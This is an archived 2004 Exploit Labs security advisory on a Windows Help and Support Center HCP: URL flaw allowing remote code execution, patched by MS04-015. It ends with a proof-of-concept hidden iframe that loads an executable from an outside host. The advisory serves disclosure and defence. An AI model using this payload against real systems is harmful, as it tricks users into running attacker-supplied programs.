what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Exploit Labs Security Advisory 2003.27

Exploit Labs Security Advisory 2003.27
Posted May 12, 2004
Authored by Donnie Werner, Exploit Labs | Site exploitlabs.com

Exploitlabs.com Advisory 27 - Microsoft Windows Help and Support Center has a vulnerability due to an unspecified input validation error. This can be exploited via the HCP protocol on Microsoft Windows XP and Microsoft Windows 2003 through Internet Explorer or Outlook and allows for arbitrary code execution.

tags | advisory, arbitrary, code execution, protocol
systems | windows
SHA-256 | d988b8210aca1e91cb4d3d9dd5b3f573ea60e02d6175fb32fad685eae2dc0074

Exploit Labs Security Advisory 2003.27

Change Mirror Download
------------------------------------------------------------
- EXPL-A-2003-027 exploitlabs.com Advisory 027 -
------------------------------------------------------------
- Windows Help Center - Dvdupgrade -



OVERVIEW
========
"Help and Support Center (HSC) is a feature in Windows that provides
help on a variety of topics" It can also be accessed via HCP: URLs.
HSC is installed by default on Windows XP and Windows Server 2003 systems.

An input invalidation vulnerability in HSC allows exposes users to
a remote code execution vulnerability that allows an attacker to run
arbitrary code when the victim opens a specially formatted HCP: URL.
The user may be automatically directed to such URL when a web page is
viewed. The issue can also be exploited via e-mail.


AFFECTED PRODUCTS
=================
Microsoft Windows Operating Systems with Help and Support Center

Microsoft Windows XP and Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerT 2003
Microsoft Windows Server 2003


items: "%windir%\PCHealth\HelpCtr\Binaries\HelpCtr.exe
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.htm
%windir%\PCHEALTH\HELPCTR\System\DVDUpgrd.js


DETAILS
=======
The HSC installation contains various HTML and javascript files,which
are intended to be used by HSC's internal use. The HTML files belong
in the My Computer Zone because they require e.g. the ability to
launch external helper programs with JavaScript.

By using a specialy crafted url an attacker can cause the users local
machine to start and render helpctr.exe in the local context and passes
the injected url to the application. The user is then presented with the
Help and Support DvD Upgrade dialog in Help and Support Center.

With the Dvdupgrade page, The injected url is now linked to the "upgrade
now" button. By pressing the updrade now button, the user is presented
with a (open) / (save) dialog box with the offending ( attackers ) file.


This allows an attacker to initiate the Dvdupgrade action on HSC,
inject JavaScript code which will be run in the context of these HTML
files, speciffically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this
way the attacker can run scripts in the My Computer Zone, which can
e.g. download an start an attacker-supplied EXE program.

As an aside, no url activity is displayed and there is no address or status
bar for Help and Support.



SOLUTION
========
Microsoft was contacted on March 18th, 2004. A patch has been
produced to correct the vulnerability. They have issued the
following:

Microsoft Security Bulletin MS04-015
Vulnerability in Help and Support Center Could Allow Remote Code Execution
(840374)
Issued: May 11, 2004
Version: 1.0
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Important
Recommendation: Customers should install the update at the earliest
opportunity.

Information about the vunerability and the patch can be found at

http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx



PROOF OF CONCEPT
================
<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc
/dvd
upgd/dvdupgd.exe"
width="1" height="1">
</iframe>



http://exploitlabs.com/msnspoof/poc/
http://exploitlabs.com/msnspoof/poc/index2.html

http://exploitlabs.com/msnspoof/poc/index3.jpg



CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner
Information Security Specialist
security@exploitlabs.com
--
Web: http://exploitlabs.com
Ph: (360)-312-8011
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close